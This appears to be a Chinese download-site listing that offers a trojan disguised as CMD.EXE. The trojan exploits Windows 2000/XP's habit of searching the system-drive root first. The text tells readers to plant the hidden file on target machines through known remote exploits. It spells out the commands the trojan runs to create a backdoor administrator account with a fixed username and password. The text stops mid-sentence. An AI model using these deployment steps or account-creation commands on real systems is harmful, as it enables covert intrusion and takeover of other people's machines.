你是不是經常在開始菜單的運行窗口里運行命令呢? 看看這個漏洞: http://zdnet.com /2100-1105-964057.html win2000和xp在執(zhí)行搜索的時候, 首先查找根目錄 而開始菜單的運行窗口里執(zhí)行命令, 也是首先在系統(tǒng)盤的根目錄里進行查找. 這個漏洞其實是已經是公開的秘密了. 既然現在作為漏洞公布出來, 我也就把網上的PasswordReminder.cpp拿來改了改 加了一個加超級管理員用戶和執(zhí)行cmd.exe的功能. 使用方法: 把程序解壓, 把壓縮包里的文件 CMD.EXE (該文件具有隱藏和只讀屬性) 釋放到目標機器的系統(tǒng)盤根目錄, 一般都是在C:比如利用UNICODE/Decode漏洞就有寫根目錄的權限, 同時Asp/fp30reg.dll等遠程溢出出來的Shell, 一般都只有匿名權限, 但是它具有寫根目錄的權限 這個時候, 就可以把本程序放到目標機器的系統(tǒng)盤根目錄 只要等管理員在機器的開始菜單里運行命令: cmd 一切盡在掌握中.:) PS: 系統(tǒng)執(zhí)行后, 會先產生一個線程來做一些處理 然后用system()函數調用cmd.exe來讓用戶能夠執(zhí)行命令. 產生出來的線程會產生兩個進程序執(zhí)行如下兩個命令: net user ISUR_IWAM wwwcnhonkercom /add net localgroup administrators ISUR_IWAM /add 這樣就在系統(tǒng)上增加了一個超級
標簽:
964057
zdnet
http
2100
上傳時間:
2015-01-12
上傳用戶:qlpqlq